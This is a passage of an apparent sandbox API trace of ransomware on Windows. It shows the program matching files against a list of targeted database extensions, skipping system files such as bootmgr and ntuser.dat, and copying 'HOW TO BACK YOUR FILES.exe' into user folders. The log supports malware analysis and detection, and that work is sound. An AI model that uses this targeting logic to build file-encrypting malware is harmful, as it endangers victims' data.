(lpString="mdf") returned 3 [0039.854] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0039.854] lstrlenW (lpString="mdb") returned 3 [0039.854] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0039.854] lstrlenW (lpString="sql") returned 3 [0039.855] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0039.855] lstrlenW (lpString="sqlite") returned 6 [0039.855] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0039.855] lstrlenW (lpString="sqlite3") returned 7 [0039.855] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0039.855] lstrlenW (lpString="sqlitedb") returned 8 [0039.855] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0039.855] lstrlenW (lpString="xml") returned 3 [0039.855] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0039.855] lstrlenW (lpString="$er") returned 3 [0039.855] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0039.855] lstrlenW (lpString="4dd") returned 3 [0039.855] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0039.855] lstrlenW (lpString="4dl") returned 3 [0039.855] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0039.855] lstrlenW (lpString="^^^") returned 3 [0039.855] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0039.855] lstrlenW (lpString="abs") returned 3 [0039.855] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0039.855] lstrlenW (lpString="abx") returned 3 [0039.855] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0039.855] lstrlenW (lpString="accdb") returned 5 [0039.855] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0039.855] lstrlenW (lpString="accdc") returned 5 [0039.855] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0039.855] lstrlenW (lpString="accde") returned 5 [0039.855] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0039.855] lstrlenW (lpString="accdr") returned 5 [0039.855] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0039.855] lstrlenW (lpString="accdt") returned 5 [0039.855] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0039.855] lstrlenW (lpString="accdw") returned 5 [0039.855] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0039.855] lstrlenW (lpString="accft") returned 5 [0039.855] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0039.856] lstrlenW (lpString="adb") returned 3 [0039.856] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.856] lstrlenW (lpString="adb") returned 3 [0039.856] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.856] lstrlenW (lpString="ade") returned 3 [0039.856] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0039.856] lstrlenW (lpString="adf") returned 3 [0039.856] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0039.856] lstrlenW (lpString="adn") returned 3 [0039.856] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0039.856] lstrlenW (lpString="adp") returned 3 [0039.856] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0039.856] lstrlenW (lpString="alf") returned 3 [0039.856] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0039.856] lstrlenW (lpString="ask") returned 3 [0039.856] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0039.856] lstrlenW (lpString="btr") returned 3 [0039.856] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0039.856] lstrlenW (lpString="cat") returned 3 [0039.856] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0039.856] lstrlenW (lpString="cdb") returned 3 [0039.856] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0039.856] lstrlenW (lpString="ckp") returned 3 [0039.856] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0039.856] lstrlenW (lpString="cma") returned 3 [0039.856] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0039.856] lstrlenW (lpString="cpd") returned 3 [0039.856] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0039.856] lstrlenW (lpString="dacpac") returned 6 [0039.856] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0039.856] lstrlenW (lpString="dad") returned 3 [0039.856] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0039.856] lstrlenW (lpString="dadiagrams") returned 10 [0039.856] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0039.856] lstrlenW (lpString="daschema") returned 8 [0039.856] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0039.857] lstrlenW (lpString="db-journal") returned 10 [0039.857] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0039.857] lstrlenW (lpString="db-shm") returned 6 [0039.857] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0039.857] lstrlenW (lpString="db-wal") returned 6 [0039.857] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0039.857] lstrlenW (lpString="dbc") returned 3 [0039.857] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0039.857] lstrlenW (lpString="dbs") returned 3 [0039.857] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0039.857] lstrlenW (lpString="dbt") returned 3 [0039.857] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0039.857] lstrlenW (lpString="dbv") returned 3 [0039.857] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0039.857] lstrlenW (lpString="dbx") returned 3 [0039.857] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0039.857] lstrlenW (lpString="dcb") returned 3 [0039.857] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0039.857] lstrlenW (lpString="dct") returned 3 [0039.857] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0039.857] lstrlenW (lpString="dcx") returned 3 [0039.857] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0039.857] lstrlenW (lpString="ddl") returned 3 [0039.857] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0039.857] lstrlenW (lpString="dlis") returned 4 [0039.857] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0039.857] lstrlenW (lpString="dp1") returned 3 [0039.857] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0039.857] lstrlenW (lpString="dqy") returned 3 [0039.857] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0039.857] lstrlenW (lpString="dsk") returned 3 [0039.857] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0039.857] lstrlenW (lpString="dsn") returned 3 [0039.857] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0039.857] lstrlenW (lpString="dtsx") returned 4 [0039.858] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0039.858] lstrlenW (lpString="dxl") returned 3 [0039.858] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0039.858] lstrlenW (lpString="eco") returned 3 [0039.858] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0039.858] lstrlenW (lpString="ecx") returned 3 [0039.858] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0039.858] lstrlenW (lpString="edb") returned 3 [0039.858] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0039.858] lstrlenW (lpString="epim") returned 4 [0039.858] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0039.858] lstrlenW (lpString="fcd") returned 3 [0039.858] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0039.858] lstrlenW (lpString="fdb") returned 3 [0039.858] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0039.858] lstrlenW (lpString="fic") returned 3 [0039.858] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0039.858] lstrlenW (lpString="flexolibrary") returned 12 [0039.858] lstrlenW (lpString="fm5") returned 3 [0039.858] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0039.858] lstrlenW (lpString="fmp") returned 3 [0039.858] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0039.858] lstrlenW (lpString="fmp12") returned 5 [0039.858] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0039.858] lstrlenW (lpString="fmpsl") returned 5 [0039.858] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0039.858] lstrlenW (lpString="fol") returned 3 [0039.858] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0039.858] lstrlenW (lpString="fp3") returned 3 [0039.858] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0039.858] lstrlenW (lpString="fp4") returned 3 [0039.858] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0039.858] lstrlenW (lpString="fp5") returned 3 [0039.858] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0039.859] lstrlenW (lpString="fp7") returned 3 [0039.859] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0039.859] lstrlenW (lpString="fpt") returned 3 [0039.859] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0039.859] lstrlenW (lpString="frm") returned 3 [0039.859] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0039.859] lstrlenW (lpString="gdb") returned 3 [0039.859] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.859] lstrlenW (lpString="gdb") returned 3 [0039.859] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.859] lstrlenW (lpString="grdb") returned 4 [0039.859] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0039.859] lstrlenW (lpString="gwi") returned 3 [0039.859] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0039.859] lstrlenW (lpString="hdb") returned 3 [0039.859] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0039.859] lstrlenW (lpString="his") returned 3 [0039.859] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0039.859] lstrlenW (lpString="ib") returned 2 [0039.859] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0039.859] lstrlenW (lpString="idb") returned 3 [0039.859] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0039.859] lstrlenW (lpString="ihx") returned 3 [0039.859] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0039.859] lstrlenW (lpString="itdb") returned 4 [0039.859] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0039.859] lstrlenW (lpString="itw") returned 3 [0039.859] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0039.859] lstrlenW (lpString="jet") returned 3 [0039.859] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0039.859] lstrlenW (lpString="jtx") returned 3 [0039.859] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0039.859] lstrlenW (lpString="kdb") returned 3 [0039.859] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0039.859] lstrlenW (lpString="kexi") returned 4 [0039.860] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0039.860] lstrlenW (lpString="kexic") returned 5 [0039.860] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0039.860] lstrlenW (lpString="kexis") returned 5 [0039.860] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0039.860] lstrlenW (lpString="lgc") returned 3 [0039.860] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0039.860] lstrlenW (lpString="lwx") returned 3 [0039.860] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0039.860] lstrlenW (lpString="maf") returned 3 [0039.860] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0039.860] lstrlenW (lpString="maq") returned 3 [0039.860] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0039.860] lstrlenW (lpString="mar") returned 3 [0039.860] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0039.860] lstrlenW (lpString="marshal") returned 7 [0039.860] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0039.860] lstrlenW (lpString="mas") returned 3 [0039.860] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0039.860] lstrlenW (lpString="mav") returned 3 [0039.860] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0039.860] lstrlenW (lpString="maw") returned 3 [0039.860] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0039.860] lstrlenW (lpString="mdbhtml") returned 7 [0039.860] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0039.860] lstrlenW (lpString="mdn") returned 3 [0039.860] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0039.860] lstrlenW (lpString="mdt") returned 3 [0039.860] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0039.860] lstrlenW (lpString="mfd") returned 3 [0039.860] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0039.860] lstrlenW (lpString="mpd") returned 3 [0039.860] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0039.860] lstrlenW (lpString="mrg") returned 3 [0039.860] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0039.860] lstrlenW (lpString="mud") returned 3 [0039.861] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0039.861] lstrlenW (lpString="mwb") returned 3 [0039.861] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0039.861] lstrlenW (lpString="myd") returned 3 [0039.861] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0039.861] lstrlenW (lpString="ndf") returned 3 [0039.861] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0039.861] lstrlenW (lpString="nnt") returned 3 [0039.861] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0039.861] lstrlenW (lpString="nrmlib") returned 6 [0039.861] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0039.861] lstrlenW (lpString="ns2") returned 3 [0039.861] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0039.861] lstrlenW (lpString="ns3") returned 3 [0039.861] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0039.861] lstrlenW (lpString="ns4") returned 3 [0039.861] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0039.861] lstrlenW (lpString="nsf") returned 3 [0039.861] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0039.861] lstrlenW (lpString="nv") returned 2 [0039.861] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0039.861] lstrlenW (lpString="nv2") returned 3 [0039.861] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0039.861] lstrlenW (lpString="nwdb") returned 4 [0039.861] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0039.861] lstrlenW (lpString="nyf") returned 3 [0039.861] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0039.861] lstrlenW (lpString="odb") returned 3 [0039.861] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.861] lstrlenW (lpString="odb") returned 3 [0039.861] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.861] lstrlenW (lpString="oqy") returned 3 [0039.861] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0039.861] lstrlenW (lpString="ora") returned 3 [0039.862] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0039.862] lstrlenW (lpString="orx") returned 3 [0039.862] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0039.862] lstrlenW (lpString="owc") returned 3 [0039.862] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0039.862] lstrlenW (lpString="p96") returned 3 [0039.862] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0039.862] lstrlenW (lpString="p97") returned 3 [0039.862] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0039.862] lstrlenW (lpString="pan") returned 3 [0039.862] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0039.862] lstrlenW (lpString="pdb") returned 3 [0039.862] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0039.862] lstrlenW (lpString="pdm") returned 3 [0039.862] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0039.862] lstrlenW (lpString="pnz") returned 3 [0039.862] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0039.862] lstrlenW (lpString="qry") returned 3 [0039.862] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0039.862] lstrlenW (lpString="qvd") returned 3 [0039.862] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0039.862] lstrlenW (lpString="rbf") returned 3 [0039.862] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0039.862] lstrlenW (lpString="rctd") returned 4 [0039.862] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0039.862] lstrlenW (lpString="rod") returned 3 [0039.862] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0039.862] lstrlenW (lpString="rodx") returned 4 [0039.862] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0039.862] lstrlenW (lpString="rpd") returned 3 [0039.862] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0039.862] lstrlenW (lpString="rsd") returned 3 [0039.862] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0039.863] lstrlenW (lpString="sas7bdat") returned 8 [0039.863] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0039.863] lstrlenW (lpString="sbf") returned 3 [0039.863] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0039.863] lstrlenW (lpString="scx") returned 3 [0039.863] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0039.863] lstrlenW (lpString="sdb") returned 3 [0039.863] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0039.863] lstrlenW (lpString="sdc") returned 3 [0039.863] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0039.863] lstrlenW (lpString="sdf") returned 3 [0039.863] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0039.863] lstrlenW (lpString="sis") returned 3 [0039.863] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0039.863] lstrlenW (lpString="spq") returned 3 [0039.863] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0039.863] lstrlenW (lpString="te") returned 2 [0039.863] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0039.863] lstrlenW (lpString="teacher") returned 7 [0039.863] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0039.863] lstrlenW (lpString="tmd") returned 3 [0039.863] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0039.863] lstrlenW (lpString="tps") returned 3 [0039.863] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0039.863] lstrlenW (lpString="trc") returned 3 [0039.863] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.863] lstrlenW (lpString="trc") returned 3 [0039.863] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.863] lstrlenW (lpString="trm") returned 3 [0039.863] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0039.863] lstrlenW (lpString="udb") returned 3 [0039.863] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0039.863] lstrlenW (lpString="udl") returned 3 [0039.864] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0039.864] lstrlenW (lpString="usr") returned 3 [0039.864] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0039.864] lstrlenW (lpString="v12") returned 3 [0039.864] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0039.864] lstrlenW (lpString="vis") returned 3 [0039.864] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0039.864] lstrlenW (lpString="vpd") returned 3 [0039.864] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0039.864] lstrlenW (lpString="vvv") returned 3 [0039.864] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0039.864] lstrlenW (lpString="wdb") returned 3 [0039.864] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0039.864] lstrlenW (lpString="wmdb") returned 4 [0039.864] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0039.864] lstrlenW (lpString="wrk") returned 3 [0039.864] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0039.864] lstrlenW (lpString="xdb") returned 3 [0039.864] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0039.864] lstrlenW (lpString="xld") returned 3 [0039.864] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0039.864] lstrlenW (lpString="xmlff") returned 5 [0039.864] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0039.864] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x496c03c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x496c03c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0039.864] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0039.864] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0039.864] lstrcmpiW (lpString1="Sample Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.864] lstrcmpiW (lpString1="Sample Pictures", lpString2="aoldtz.exe") returned 1 [0039.864] lstrcmpiW (lpString1="Sample Pictures", lpString2=".") returned 1 [0039.864] lstrcmpiW (lpString1="Sample Pictures", lpString2="..") returned 1 [0039.864] lstrcmpiW (lpString1="Sample Pictures", lpString2="windows") returned -1 [0039.864] lstrcmpiW (lpString1="Sample Pictures", lpString2="bootmgr") returned 1 [0039.864] lstrcmpiW (lpString1="Sample Pictures", lpString2="temp") returned -1 [0039.865] lstrcmpiW (lpString1="Sample Pictures", lpString2="pagefile.sys") returned 1 [0039.865] lstrcmpiW (lpString1="Sample Pictures", lpString2="boot") returned 1 [0039.865] lstrcmpiW (lpString1="Sample Pictures", lpString2="ids.txt") returned 1 [0039.865] lstrcmpiW (lpString1="Sample Pictures", lpString2="ntuser.dat") returned 1 [0039.865] lstrcmpiW (lpString1="Sample Pictures", lpString2="perflogs") returned 1 [0039.865] lstrcmpiW (lpString1="Sample Pictures", lpString2="MSBuild") returned 1 [0039.865] lstrlenW (lpString="Sample Pictures") returned 15 [0039.865] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\desktop.ini") returned 36 [0039.865] lstrcpyW (in: lpString1=0x2e2e892, lpString2="Sample Pictures" | out: lpString1="Sample Pictures") returned="Sample Pictures" [0039.865] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures", dwFileAttributes=0x10) returned 1 [0039.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d22e0 [0039.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x52) returned 0x2c8fc8 [0039.865] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d22e8 | out: ListHead=0x2e77d0, ListEntry=0x2d22e8) returned 0x2d22a8 [0039.865] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0039.865] FindClose (in: hFindFile=0x2cd0a8 | out: hFindFile=0x2cd0a8) returned 1 [0039.865] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d22e8 [0039.865] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures") returned="C:\\Users\\Public\\Pictures\\Sample Pictures" [0039.865] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8fc8 | out: hHeap=0x2b0000) returned 1 [0039.865] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0039.865] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures") returned 40 [0039.865] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures") returned="C:\\Users\\Public\\Pictures\\Sample Pictures" [0039.866] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.866] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\pictures\\sample pictures\\how to back your files.exe"), bFailIfExists=1) returned 1 [0039.872] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0039.872] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4970c680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4970c680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0a8 [0039.872] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.872] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0039.872] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0039.872] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4970c680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4970c680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.872] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.872] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0039.872] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0039.872] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0039.872] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Chrysanthemum.jpg", cAlternateFileName="CHRYSA~1.JPG")) returned 1 [0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.873] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="aoldtz.exe") returned 1 